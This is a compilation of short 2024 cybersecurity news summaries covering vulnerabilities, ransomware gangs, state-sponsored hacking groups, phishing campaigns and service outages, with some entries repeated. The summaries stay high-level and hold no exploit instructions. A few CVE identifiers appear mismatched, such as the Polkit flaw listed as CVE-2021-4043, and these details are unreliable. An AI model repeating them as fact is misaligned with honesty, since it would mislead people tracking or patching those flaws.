In May 2024, Ivanti released patches to address a SQL injection vulnerability in its Endpoint Manager. Tracked as CVE-2024-29824, the flaw impacts the Core server of Ivanti EPM 2022 SU5 and prior, and can be exploited by an unauthenticated attacker within the same network to execute arbitrary code. In its initial advisory, Ivanti did not have evidence to suggest that the flaw was exploited in attacks in the wild. However, the vendor recently updated the advisory stating that it is aware of in-the-wild exploitation. According to Ivanti, CVE-2024-29824 has been used against “a limited number of customers.” Details of these attacks have not been disclosed at this time. CISA recently added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, advising organizations to apply patches by October 23.

Stonefly: Extortion Attacks Continue Against U.S. Targets

On July 25, 2024, Rim Jong Hyok, an alleged member of the North Korean threat group Stonefly (aka Andariel, APT45, Silent Chollima, Onyx Sleet), was indicted by the U.S. Justice Department for his involvement in extorting U.S. hospitals and other healthcare providers between 2021 and 2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against targets in the defense, technology, and government sectors worldwide.

New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking

Linux servers are under threat from a stealthy malware known as "perfctl," aimed at running cryptocurrency mining and proxyjacking software. This malware employs advanced evasion tactics, remaining inactive during user activity and deleting its own files to avoid detection. It exploits a vulnerability in Polkit (CVE-2021-4043) to gain root access and install the miner. The name "perfctl" is a deliberate attempt to mimic legitimate system processes. The attack typically involves exploiting vulnerable Apache RocketMQ instances to deliver the malware. Once activated, perfctl hides itself by copying to different locations and may also download additional proxyjacking tools from remote servers.

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) have released a joint advisory warning against a group of Iran-based cyber actors that has conducted a high volume of computer network intrusion attempts against U.S. and foreign organizations since 2017 and as recently as August 2024, including schools, municipal governments, financial institutions, and healthcare facilities.

Critical WPML Plugin Flaw Exposes WordPress Sites to Remote Code Execution

A critical security vulnerability tracked as CVE-2024-6386 has been disclosed in the WPML WordPress multilingual plugin. WPML is a popular plugin used for building multilingual WordPress sites. It has over one million active installations. This vulnerability could allow authenticated users with Contributor-level access or higher to execute arbitrary code remotely under certain circumstances.

APT Group Exploits Wps Office for Windows RCE Vulnerability (CVE-2024-7262)

ESET researchers discovered a remote code execution vulnerability (CVE-2024-7262) in WPS Office for Windows, which was actively exploited by the South Korea-aligned cyberespionage group APT-C-60. This group targeted users in East Asian countries, leveraging the vulnerability to deploy a custom backdoor named "SpyGlace" by ESET, designed for cyberespionage purposes.

What Is Volt Typhoon?

Volt Typhoon is a Chinese state-sponsored hacker group known by various aliases such as Vanguard Panda and Bronze Silhouette. Recent developments reveal that these hackers have exploited a high-severity zero-day vulnerability in the Versa Director platform, which is used by ISPs to manage complex networks.

What Is Volt Typhoon?

Volt Typhoon is a Chinese state-sponsored hacker group known by various aliases such as Vanguard Panda and Bronze Silhouette. Recent developments reveal that these hackers have exploited a high-severity zero-day vulnerability in the Versa Director platform, which is used by ISPs to manage complex networks.

NCSC Advisory - WhatsApp Verification Code Scam

The National Cyber Security Centre (NCSC) of Ireland is warning of a growing trend in WhatsApp verification code scams targeting users. These scams initiate with the actors obtaining the victim's phone number and entering the number into WhatsApp's login screen.

Hackers Infect ISPs with Malware That Steals Customers' Credentials

Malicious hackers, likely backed by the Chinese government, have exploited a critical zero-day vulnerability in the Versa Director virtualization platform used by ISPs. This vulnerability, tracked as CVE-2024-39717, allowed attackers to infect at least four US-based ISPs with malware named "VersaMem," which steals customer credentials before they are encrypted.

Newly Discovered Group Offers CAPTCHA-Solving Services to Cybercriminals

A previously undiscovered group, dubbed "Greasy Opal," has been found aiding cyber attackers by providing CAPTCHA-solving services and other tools to bypass security measures. This group, based in the Czech Republic and active since 2009, was recently identified by Arkose Cyber Threat Intelligence Research after its tools were used in attacks on Arkose Labs' customers.

Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp

Meta shared insights on a small cluster of likely social engineering activity on WhatsApp that its security team was able to block after investigating user reports. This activity which originated from Iran attempted to target individuals in Israel, Palestine, Iran, the United States and the UK, focusing on political and diplomatic officials, and other public figures, including some associated with administrations of President Biden and former President Trump.

Bling Libra's Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware

Unit 42's recent investigation uncovered a shift in strategy by the Bling Libra group, which is known for its ShinyHunters ransomware. Instead of just selling stolen data as they have in the past, they've now turned to extorting their victims. This new approach involves using legitimate credentials they found in public repositories to break into and compromise Amazon Web Services (AWS) environments.

Critical Flaw in WordPress LiteSpeed Cache Plugin Allows Hackers Admin Access

A critical security vulnerability (CVE-2024-28000) has been identified in the LiteSpeed Cache plugin for WordPress, a widely used caching plugin with over five million active installations. This vulnerability, discovered by John Blackburn and submitted via the Patchstack Zero Day bug bounty program for WordPress, could allow unauthenticated attackers to gain administrator privileges on vulnerable WordPress websites.

Enterprise Server Vulnerable to Critical Auth Bypass Flaw

A critical vulnerability, CVE-2024-6800, was discovered in GitHub Enterprise Server by “ahacker1” through GitHub's Bug Bounty Program. This vulnerability could be exploited by an attacker with network access to bypass authentication and gain administrator privileges on the affected machine.

Most Ransomware Attacks Now Happen at Night

A report from Malwarebytes reveals that most ransomware attacks now occur between 1 a.m. and 5 a.m., aiming to catch cybersecurity teams off guard. The 2024 State of Ransomware Report, based on threat intelligence from Malwarebytes' ThreatDown unit, indicates that a majority of incidents happen in the early morning,

Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts

Yesterday, the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint statement, highlighting Iran's longstanding interest in exploiting societal tensions, including the use of cyber operations to attempt to gain access to sensitive information related to U.S. elections.

Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor

A newly discovered backdoor named Msupedge has been deployed in a cyberattack against an unnamed university in Taiwan. The backdoor stands out due to its unconventional method of communicating with its command-and-control server via DNS traffic, which is a relatively rare and stealthy technique. The origins and objectives behind the Msupedge attack remain unknown.

Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America

A recent report by Kaspersky details the activities of BlindEagle, an APT group targeting Latin American entities and individuals since at least 2018. The group employs a variety of tactics, techniques, and procedures (TTPs) to achieve its objectives, which fluctuate between financial gain and espionage. BlindEagle primarily leverages phishing campaigns, often impersonating government or financial institutions, to deliver malicious payloads.

Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

A recent ValleyRAT malware campaign targeting Chinese speakers has been identified by FortiGuard Labs. This multi-stage malware employs sophisticated evasion techniques to establish persistent control over compromised systems. Key characteristics include heavy reliance on shellcode for in-memory execution, reducing file footprint, and the use of legitimate application icons to deceive victims.

Researchers Uncover New Infrastructure Tied to FIN7 Cybercrime Group

Researchers have uncovered new infrastructure linked to the financially motivated cybercrime group FIN7. This discovery, detailed in a report by Team Cymru in collaboration with Silent Push and Stark Industries Solutions, reveals two clusters of FIN7 activity connected to IP addresses from Post Ltd in Russia and SmartApe in Estonia.

New Mad Liberator Gang Uses Fake Windows Update Screen to Hide Data Theft

Sophos uncovered details on a new ransomware operation dubbed Mad Liberator, which uses social engineering to obtain access to victim environments, targeting users who use remote access tools installed on endpoints and servers. Since initiating operations in mid-July, 2024. Mad Liberator has been observed targeting users of Anydesk, a popular software used by IT teams to manage their environments, particularly when working with remote users and devices.

Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks

Malicious actors are increasingly using a cloud-based attack tool called Xeon Sender to conduct widespread smishing and spam campaigns by abusing legitimate software-as-a-service (SaaS) platforms. The tool, as noted by SentinelOne security researcher Alex Delamotte, allows attackers to send bulk SMS messages through multiple SaaS providers by using valid credentials for those services. Importantly, Xeon Sender doesn't exploit any inherent vulnerabilities in these providers but instead uses their legitimate APIs to carry out large-scale SMS spam attacks.

Attackers Exploit Public .env Files to Breach Cloud and Social Media Accounts

Unit 42 researchers uncovered a highly sophisticated extortion campaign that specifically targeted cloud environments by exploiting exposed environment variable files, commonly referred to as .env files. These files, which are often used to store sensitive information such as cloud service keys, API tokens, and database credentials, were inadvertently exposed due to misconfigurations in web servers and applications.

Ransomware Attack on Indian Payment System Traced Back to Jenkins Bug

A recent ransomware attack targeting India's National Payments Corporation (NPCI) has been linked to a flaw in Jenkins, a popular automation tool. The security weakness, known as CVE-2024-23897, was found in Jenkins' Command Line Interface, enabling unauthorized access to sensitive data on servers that hadn't been updated with the latest security patches.

Rogue PyPI Library Solana Users, Steals Blockchain Wallet Keys

A recent discovery by security researchers at Sonatype, published on August 7th, 2024, highlights a new malicious package on the Python Package Index (PyPI) masquerading as a legitimate Solana blockchain library, "solana-py". This fake package leverages a typosquat technique, exploiting the slight naming discrepancy between the genuine "solana-py" project on GitHub and its simplified name "solana" on PyPI.

Australian Gold Producer Evolution Mining Hit by Ransomware

On August 8, 2024, Evolution Mining, a prominent Australian gold mining firm, experienced a ransomware attack that impacted its IT systems. The company has engaged external cyber forensic experts to investigate the incident, which is currently believed to be contained. While the attack disrupted IT operations, it is not anticipated to significantly impact overall mining operations.

CVE-2024-43121 - HUSKY Plugin Vulnerability

HUSKY, a products filter plugin for the e-commerce product plugin WooCommerce, developed by “realmag777” which enhances the functionality of the base WooCommerce product for WordPress. Around 478 million websites are built on WordPress. It empowers your website visitors to easily search and filter WooCommerce products based on: categories, attributes, tags, taxonomies, meta fields, and product prices.

Beyond the Hype: Unveiling the Realities of WormGPT in Cybersecurity

In this report, they delve into WormGPT—a Dark Web counterpart to ChatGPT, which is designed to quickly generate phishing emails, malware, and harmful recommendations for hackers. Despite its alarming reputation, many of the concerns surrounding WormGPT are rooted in misunderstandings and exaggerations about AI-based hacking applications.

Inc Ransomware Encryptor Contains Keys to Victim Data Recovery

The Inc ransomware group recently carried out a significant cyberattack on McLaren Health Care, a multibillion-dollar healthcare network operating across Michigan, Indiana, and Ohio. The attack severely disrupted McLaren's IT and phone systems, forcing hospitals and outpatient clinics to implement "downtime procedures."

Emerging Phishing Campaign Targeting AWS Accounts

Wiz Threat Research has shed light on a new phishing campaign targeting AWS accounts. The campaign was spotted after an employee at Wiz received a phishing email containing a PNG image. The email was sent from an AWS account (likely compromised) using a spoofed email address -admin@alchemistdigital[.]ae.

Microsoft Fixes Six Actively Exploited Bugs

On August 14, 2024, Microsoft issued patches for six actively exploited vulnerabilities as part of its regular Patch Tuesday updates. These flaws affect Microsoft Project, various Windows products, and the Windows Scripting Engine. Notably, one high-severity vulnerability in Microsoft Project (CVE-2024-38189) could allow remote code execution if a victim opens a malicious file.

Iran Is Accelerating Cyber Activity That Appears Meant to Influence the US Election, Microsoft Says

Iran-linked threat actors are accelerating their malicious online activity intending to influence the United States presidential election by capitalizing on political polarization via TTPs such as creating fake news websites that target extremists, impersonating U.S. political activists, performing email phishing attacks from former political advisors, and making attempts to successfully log into an account belonging to a former presidential candidate, all to stoke division and political tension, especially in swing states where they potentially have the most influence.

ADT Confirms Data Breach After Customer Info Leaked on Hacking Forum

Security giant ADT has confirmed that it suffered a data breach after actors allegedly leaked stolen customer data on Breached Forums, a popular cybercriminal platform. In a form 8-K filing with the Securities and Exchange Commission (SEC), ADT stated that it recently “experienced a cybersecurity incident during which unauthorized actors illegally accessed certain databases containing ADT customer order information.”

US Dismantles Laptop Farm Used by Undercover North Korean IT Workers

The U.S. Justice Department arrested Matthew Isaac Knoot, a 38-year-old Nashville man, for aiding North Korean IT workers in obtaining remote work at U.S. companies by posing as U.S.-based individuals. Knoot operated a "laptop farm," using stolen identities, including that of "Andrew M.," to deceive companies into sending laptops to his residence.

CrowdStrike's Legal Pressures Mount, Could Blaze Path to Liability

The CrowdStrike update from July, which caused significant disruptions across industries, has led to a flurry of lawsuits from investors and affected companies. This update, known as "Channel File 291," resulted in major operational issues, including crashes on 8.5 million computers, with damages estimated at $5.4 billion.

#StopRansomware: Blacksuit (Royal) Ransomware

CISA and the FBI have updated a joint advisory released back in March 2023 on the Royal ransomware group, highlighting that the gang has now rebranded into the BlackSuit operation. BlackSuit which is an evolution of the Royal ransomware, has been observed in attacks from September 2022 through June 2023 and shares numerous code similarities with Royal ransomware while exhibiting improved capabilities.

North Korea Kimsuky Launch Phishing Attacks on Universities

Researchers have detailed activities of the North Korean APT group Kimsuky, which has been targeting universities globally for espionage. Active since 2012, Kimsuky primarily targets South Korean entities but has extended its reach to the US, the UK, and Europe. The group specializes in sophisticated phishing campaigns, often impersonating academics or journalists to steal sensitive information.

Photovoltaic Platform Flaws Threatened Global Solar Grid

Researchers have discovered critical flaws in software that manages 20% of the world's solar electricity, posing significant risks of grid overloads and blackouts. Although solar power currently represents a minor share of U.S. electricity generation, it is projected to grow exponentially and potentially make up half of domestic electricity generation by 2050.

Attackers Use Multiple Techniques to Bypass Reputation-Based Security

Reputation-based security controls may not be as effective as commonly assumed in protecting organizations against unsafe web applications and content, according to a new study by Elastic Security. Researchers have identified several techniques attackers use to bypass these mechanisms, which rely on the reputation and trustworthiness of applications and content.

Critical Progress WhatsUp RCE Flaw Now Under Active Exploitation

A path traversal vulnerability that leads to a critical and unauthenticated remote code execution (RCE) vulnerability, identified as CVE-2024-4885 reported on April 24th, 2024, affecting Progress WhatsUp Gold versions 23.1.2 and earlier has been actively exploited by threat actors since August 1, 2024. Zero Day Initiative (ZDI) publish a related advisory on July 3rd, 2024.

Cloud Cover: How Malicious Actors Are Leveraging Cloud Services

In the past year, there has been an increase in the number of threat actors leveraging legitimate cloud services in attacks. According to researchers at Symantec, trusted services like Microsoft OneDrive or Google Drive are frequently being abused given that traffic to and from such services is less likely to raise red flags than communications with attack-controlled infrastructure.

CrowdStrike Reveals Root Cause of Global System Outages

CrowdStrike has released a root cause analysis for the Falcon Sensor software update crash, which impacted millions of Windows devices globally. The incident, identified as "Channel File 291," was caused by a content validation issue linked to a new Template Type designed to enhance visibility into novel attack techniques.

Qualys 2024 Midyear Threat Landscape Review

Qualys' new 2024 Midyear Threat Landscape Review highlights a growing number of reported Common Vulnerabilities and Exposures (CVEs). From January to mid-July 2023-2024, the annual count of reported CVEs increased by 30%, from 17,114 in 2023 to 22,254 in 2024.

APT28 Targets Diplomats with HeadLace Malware via Car Sale Phishing Lure.

A sophisticated phishing campaign, linked to the Russian state-sponsored threat actor Fighting Ursa (APT28), targeted diplomatic personnel earlier this year was reported by Palo Alto Network's Unit 42. This operation employed a deceptive lure centered around a purported car sale that often resonates with diplomats, designed to entice victims into downloading a malicious ZIP archive.

New “Sitting Ducks” DNS Attack Lets Hackers Easy Domain Takeover

Researchers at Infoblox and Eclypsium have collaborated to uncover a sophisticated new attack vector within the Domain Name System (DNS), dubbed the Sitting Ducks attack. This discovery came while studying the infrastructure used by 404TDS, a Russian-hosted traffic distribution system, indicating the involvement of Russian-nexus cybercriminals.

OneBlood Target of Ransomware Event

OneBlood, the not-for-profit blood center serving much of the southeastern United States, stated that it is experiencing a ransomware event impacting its software system. While OneBlood remains operational and continues to collect, test, and distribute blood, the non-profit noted that it is operating at a significantly reduced capacity.

E-Commerce Fraud Campaign Uses 600+ Fake Sites

Security researchers have identified a sophisticated information-stealing fraud network, dubbed “Eriakos,” that lures victims to fake web shops through malicious Facebook ads. According to Recorded Future, this campaign exclusively targets mobile devices and users, making the scam websites accessible only via malvertising to evade security scanners.

DigiCert to Revoke 83,000+ SSL Certificates Due to Domain Validation Oversight

DigiCert, a certificate authority, has announced that it will revoke a subset of SSL/TLS certificates within 24 hours due to an oversight in verifying domain ownership. The affected certificates lack proper Domain Control Validation. DigiCert validates domain control by methods approved by the CA/Browser Forum, one of which involves setting up a DNS CNAME record with a random value provided by DigiCert.

Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes

A new malicious campaign has been observed utilizing Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale operation. These malicious apps, numbering over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification, leading to identity fraud.

Microsoft Says Massive Azure Outage Was Caused by DDoS Attack

On July 30th, 2024, a distributed denial-of-service (DDoS) attack triggered a service disruption impacting a subset of Microsoft 365 and Azure customers globally. The outage, lasting approximately eight hours between 11:45 UTC and 19:43 UTC, resulted in intermittent errors, timeouts, and latency spikes for affected users.

Black Basta Ransomware Switches to More Evasive Custom Malware

Black Basta is a ransomware-as-a-service (RaaS) operation that has been active since April 2022. To date, the ransomware gang has been attributed to over 500 attacks targeting organizations across the world. Just this year, the group claimed responsibility for attacks against a couple of notable victims including Veolia North America, Hyundai Motor Europe, and Keytronic.

Hacktivists Claim Leak of CrowdStrike Threat Intelligence

A hacktivist group, USDoD, has claimed to have leaked CrowdStrike's internal threat actor list, including indicators of compromise (IoCs). CrowdStrike acknowledged these claims in a blog post on July 25, 2024, noting that USDoD provided a download link for the alleged list and shared sample data on BreachForums.

Play Ransomware Group's New Linux Variant Targets ESXi, Shows Ties With Prolific Puma

Researchers at Trend Micro have uncovered a new Linux variant of the Play ransomware that is specially designed to target VMWare ESXi environments. Based on a sample submitted to VirusTotal, the Linux variant is compressed in an RAR file with its Windows variant and is hosted in the URL hxxp://108.[BLOCKED].190/FX300.rar, a domain that has been used to host tools like PsExec, NetScan, WinSCP, WinRAR, and the Coroxy backdoor, which have been used by Play actors in previous attacks.

Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

A now-patched Microsoft Defender SmartScreen vulnerability (CVE-2024-21412) has been exploited to deliver information stealers like ACR Stealer, Lumma Stealer, and Meduza Stealer. This vulnerability allowed attackers to bypass SmartScreen warnings and deliver malicious payloads. The stealer campaign is targeting Spain, Thailand, and the US. The attack chain involves a series of intricately crafted files.

Crowdstrike Outage (update)

CrowdStrike is aware of reports of crashes on Windows hosts that have taken place after installing the latest update for CrowdStrike Falcon Sensor. CrowdStrike says that it has identified a content deployment related to this issue and reverted those changes.

CrowdStrike Outage

CrowdStrike is aware of reports of crashes on Windows hosts that have taken place after installing the latest update for CrowdStrike Falcon Sensor. CrowdStrike says that it has identified a content deployment related to this issue and reverted those changes.

Hackers use PoC exploits in attacks 22 minutes after release

According to Cloudflare's 2024 Application Security report, threat actors are increasingly quick to weaponize available proof-of-concept (PoC) exploits, sometimes within just 22 minutes of their public release. Covering activity from May 2023 to March 2024, the report highlights several emerging threat trends.

Critical Apache HugeGraph Vulnerability Under Attack - Patch ASAP

A critical remote code execution vulnerability (CVE-2024-27348, CVSS: 9.8) impacting Apache HugeGraph-Server versions before 1.3.0 has been actively exploited in the wild. The flaw resides in the Gremlin graph traversal language API and allows attackers to bypass security restrictions and gain complete control over vulnerable servers.

New BugSleep Malware Implant Deployed in MuddyWater Attacks

Researchers at Check Point have disclosed details of a new backdoor implant dubbed BugSleep that is actively being deployed in attacks by MuddyWater, an Iranian state-sponsored group, to steal files of interest and run commands on compromised systems. These attacks entail the use of phishing emails disguised as invitations to webinars or online courses, designed to redirect targets to archives containing malicious payloads hosted on the Egnyte secure file-sharing platform.

Critical Exim Bug Bypasses Security Filters on 1.5 Million Mail Servers

Last Wednesday, a critical vulnerability was patched in Exim, a free mail transfer agent (MTA) that's widely used on Unix-like operating systems. Tracked as CVE-2024-29929, the vulnerability pertains to an incorrect parsing of multiline RFC2231 header filenames, allowing threat actors to remotely deliver malicious executable attachments into end users' mailboxes by circumventing the $mime_filename extension-blocking protection mechanism.

Microsoft Links Scattered Spider Hackers to Qilin Ransomware Attacks

Microsoft has reported that the Scattered Spider cybercrime gang, also known as Octo Tempest, UNC3944, and 0ktapus, has added Qilin ransomware to its arsenal and is now using it in attacks. In the second quarter of 2024, Octo Tempest, a financially motivated threat actor, incorporated RansomHub and Qilin into its ransomware campaigns.

Cybereason - HardBit Ransomware

Summary: Cybereason Security Service Team has released a new blog post highlighting the TTPs employed by HardBit, a ransomware operation that first emerged in October 2022. HardBit seems to take inspiration from the LockBit ransomware gang, with researchers noting a similarity in the marketing tactics deployed by the group including the use of similar group image/icons, image fonts, and ransom notes.

Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

The APT group Void Banshee has been exploiting a newly disclosed security flaw in the Microsoft MHTML browser engine CVE-2024-38112 to deploy the information-stealing malware Atlantida. Cybersecurity firm Trend Micro observed this activity in mid-May 2024, noting that the vulnerability was used in a multi-stage attack involving specially crafted internet shortcut (URL) files.

10,000 Victims a Day: Infostealer Garden of Low-Hanging Fruit

The article illuminates the intricate web of the cybercriminal ecosystem, with a particular focus on the role of infostealer malware. This kind of malware acts as a digital pickpocket, discretely extracting valuable data from compromised systems. The cybercriminal landscape has undergone a transformation, evolving from solitary actors taking care of the entire process, to a highly specialized marketplace where various threat groups collaborate to maximize their illicit gains, embodying a free market economic system.

Attackers Exploit URL Protections to Disguise Phishing Links

Cybercriminals are exploiting legitimate URL protection services to disguise phishing links, according to Barracuda researchers. These services, intended to protect users from malicious websites by rewriting URLs, are being misused to mask phishing URLs and direct victims to credential-harvesting sites.

DarkGate Malware Exploits Samba File Shares in Short-Lived Campaign

The recent DarkGate malware campaign, uncovered by Palo Alto Networks Unit 42, highlights a brief yet impactful exploitation of Samba file shares for malware distribution. Spanning March to April 2024, the campaign targeted regions across North America, Europe, and parts of Asia, utilizing Visual Basic Script (VBS) and JavaScript files hosted on public-facing servers.

Phishing Campaign Abuses SharePoint Servers

ANY.RUN, an interactive malware hunting service, warned on X (formerly known as Twitter) of a massive phishing campaign that is abusing SharePoint to store PDFs containing phishing links. In a span of 24 hours ANY.RUN says it observed over 500 public sandbox sessions with SharePoint phishing.

U.S. Seizes Domains Used by AI-Powered Russian Bot Farm for Disinformation

A recent U.S. Department of Justice (DoJ) operation dismantled a large-scale Russian disinformation campaign utilizing AI-powered social media bots. The bot farm, targeting the U.S. and several other countries, employed fictitious online personas disguised as real users to spread pro-Kremlin messages. The operation, believed to be sponsored by the Kremlin and facilitated by an RT employee and an FSB officer, leveraged AI software called Meliorator to create and manage the bot network.

Multiple Threat Actors Exploit PHP Flaw CVE-2024-4577 to Deliver Malware

Multiple threat actors are exploiting the recently disclosed PHP vulnerability CVE-2024-4577 to deliver various malware families, according to the Akamai Security Intelligence Response Team. This vulnerability, which has a CVSS score of 9.8, is a PHP-CGI OS Command Injection flaw in the Best-Fit feature of encoding conversion within the Windows operating system.

Chinese APT41 Upgrades Malware Arsenal with DodgeBox and MoonWalk

China-linked APT41 is suspected of using an advanced version of StealthVector malware, dubbed DodgeBox, to deliver a new backdoor named MoonWalk. Zscaler ThreatLabz discovered DodgeBox, also known as DUSTPAN, in April 2024. Researchers Yin Hong Chang and Sudeep Singh explained that DodgeBox loads MoonWalk, which shares DodgeBox's evasion techniques and uses Google Drive for command-and-control communication.

Ransomware Groups Prioritize Defense Evasion for Data Exfiltration

Ransomware attackers are increasingly focusing on defense evasion tactics to extend their dwell time within victim networks, as highlighted in a new report by Cisco Talos. This shift is primarily driven by the double-extortion ransomware model, where attackers steal sensitive data and threaten to publish it online while locking down victims' systems.

Apple IDs Targeted in US Smishing Campaign

Symantec recently published a security bulletin warning about a phishing campaign targeting Apple users in the United States. These campaigns are mostly conducted via email but have increasingly been deployed via malicious SMS text messages (smishing).

Avast Provides DoNex Ransomware Decryptor to Victims

Beginning in March 2024, law enforcement organizations have been distributing decryptor keys to victims of the DoNex ransomware, according to Avast. The antivirus provider announced on July 8 that they have been quietly offering the decryptor after identifying a cryptographic flaw in the ransomware and its predecessors.

Cybersecurity Agencies Warn of China-linked APT40's Rapid Exploit Adaptation

Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about the China-linked cyber espionage group APT40, warning of its ability to exploit new security vulnerabilities within hours or days of their public release. APT40, also known by various aliases such as Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Leviathan, Red Ladon, TA423, and TEMP.Periscope, has been active since at least 2013, primarily targeting organizations in the Asia-Pacific region.

Major ISP Accused of Mass Malware Attack on Customers

A major South Korean internet service provider, KT (formerly Korea Telecom), is facing serious allegations after reports surfaced that it installed malware on the computers of over 600,000 customers. The incident primarily targeted users of Webhard, a popular file-sharing service in South Korea.

Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks

Researchers have uncovered a sophisticated attack campaign targeting various Israeli entities using publicly available frameworks like Donut and Sliver. HarfangLab, a French cybersecurity firm, detailed the campaign, noting its highly targeted nature and the use of custom WordPress websites as payload delivery mechanisms. This campaign affects entities across unrelated verticals by leveraging well-known open-source malware.

Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks

Researchers have uncovered a sophisticated attack campaign targeting various Israeli entities using publicly available frameworks like Donut and Sliver. HarfangLab, a French cybersecurity firm, detailed the campaign, noting its highly targeted nature and the use of custom WordPress websites as payload delivery mechanisms. This campaign affects entities across unrelated verticals by leveraging well-known open-source malware.

Microsoft MSHTML Flaw Exploited to Deliver MerkSpy Spyware Tool

A recent attack campaign exploited a now-patched vulnerability (CVE-2021-40444) in Microsoft Office's MSHTML component to deliver MerkSpy spyware. This spyware primarily targeted users in Canada, India, Poland, and the U.S. The attackers meticulously crafted a deceptive Microsoft Word document disguised as a software developer job description to trick users into initiating the exploit.

CDK Global Says All Dealers Will Be Back Online By Thursday

On June 18th, CDK Global, a leading software-as-a-service provider that is used by over 15,000 car dealerships across North America, was the target of a ransomware attack, causing a massive IT outage. In particular, CDK Global's dealer management system was impacted, forcing car dealerships to switch to pen and paper, with buyers unable to purchase cars or receive service for already-bought vehicles.

Cisco Warns of NX-OS Zero-day Exploited to Deploy Custom Malware

Cisco has patched a zero-day vulnerability in NX-OS that was exploited in April to install previously unknown malware on vulnerable switches. The cybersecurity firm Sygnia reported the incidents to Cisco, attributing the attacks to a Chinese state-sponsored threat actor, Velvet Ant. Amnon Kushnir, Director of Incident Response at Sygnia, revealed that Velvet Ant used administrator-level credentials to access Cisco Nexus switches and deploy custom malware.

Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data Summary:

A North Korean APT group, Kimsuky, was discovered using a malicious Google Chrome extension codenamed TRANSLATEXT to target South Korean academia focused on North Korean affairs in March 2024. Kimsuky is a notorious hacking crew from North Korea that's known to be active since at least 2012, orchestrating cyber espionage and financially motivated attacks targeting South Korean entities.

Router Maker's Support Portal Hacked, Replies With Metamask Phishing

BleepingComputer has confirmed that the helpdesk portal of Canadian router manufacturer Mercku has been compromised and is sending MetaMask phishing emails in response to new support tickets. Mercku supplies equipment to several ISPs and networking companies, including Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom.

Critical OpenSSH Flaw Enables Full System Compromise

A critical vulnerability (CVE-2024-6387), dubbed regreSSHion, has been identified in OpenSSH servers, potentially affecting over 14 million instances exposed on the internet. This remote unauthenticated code execution flaw allows attackers to compromise systems, leading to full system control, malware installation, data manipulation, creation of backdoors, and network propagation.

Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment

Multiple security vulnerabilities have been identified in Emerson Rosemount gas chromatographs, potentially allowing attackers to access sensitive information, cause denial-of-service (DoS) conditions, and execute arbitrary commands. The affected models include GC370XA, GC700XA, and GC1500XA, with versions 4.1.5 and earlier. Claroty, an operational technology (OT) security firm, highlighted two command injection flaws and two authentication and authorization vulnerabilities.

Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping

Apple recently released a firmware update to address a critical vulnerability (CVE-2024-27867) affecting various AirPods models (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro. This authentication issue could have allowed a malicious actor within Bluetooth range to impersonate a trusted device and gain unauthorized access to the targeted AirPods.

Kimsuky Group's New Backdoor Appears (HappyDoor)

Ahnlab Security Intelligence Center (ASEC) has released details of a backdoor that they first identified in 2021 and have closely monitoring since then. Dubbed, Happydoor, the backdoor is attributed to the North Korean APT group Kimsuky and has been deployed in several breaches in the last couple of years.

The Growing Threat of Malware Concealed Behind Cloud Services

The analysis highlights a growing trend where cybercriminals are leveraging cloud services to enhance the capabilities of botnets like UNSTABLE and Condi. These botnets exploit vulnerabilities in various devices to establish command and control (C2) operations through cloud servers, which provides scalability and anonymity that traditional hosting methods lack.

Linux Version of RansomHub Ransomware Targets VMware ESXi VMs

According to Recorded Future, the RansomHub operation has been using a Linux encryptor since April 2024 to specifically target VMware ESXi environments in corporate attacks. The ESXi version of RansomHub's encryptor is developed in the C++ programming language and was likely derived from the now-defunct Knight ransomware's source code.

Fake Google Chrome Errors Trick You into Running Malicious PowerShell Scripts

A sophisticated malware distribution campaign has emerged, utilizing fake error messages resembling Google Chrome, Microsoft Word, and OneDrive issues to deceive users into running malicious PowerShell scripts. This campaign involves several threat actors, including ClearFake, ClickFix, and TA571, known for their previous involvement in spam distribution and malware dissemination.

Russia's Midnight Blizzard Seeks to Snow French Diplomats

French diplomatic entities have been targeted by Midnight Blizzard, a Russia-backed advanced persistent threat, since at least 2021, according to CERT-FR. This group, infamous for its involvement in the 2016 US elections interference and the 2020 SolarWinds attacks, remains a significant cyber threat.

ONNX Phishing Service Targets Microsoft 365 Accounts at Financial Firms

A new phishing-as-a-service (PhaaS) platform called ONNX Store is targeting Microsoft 365 accounts of employees at financial firms using QR codes embedded in PDF attachments. The platform, which can target both Microsoft 365 and Office 365 email accounts, operates via Telegram bots and includes mechanisms to bypass two-factor authentication (2FA).

New ARM 'TIKTAG' attack impacts Google Chrome, Linux systems

A new speculative execution attack named "TIKTAG" targets ARM's Memory Tagging Extension, achieving over a 95% success rate in leaking data and bypassing this security feature. This attack, demonstrated by researchers from Samsung, Seoul National University, and the Georgia Institute of Technology, affects Google Chrome and the Linux kernel.

Report Reveals Record Exploitation Rate For Load Balancers

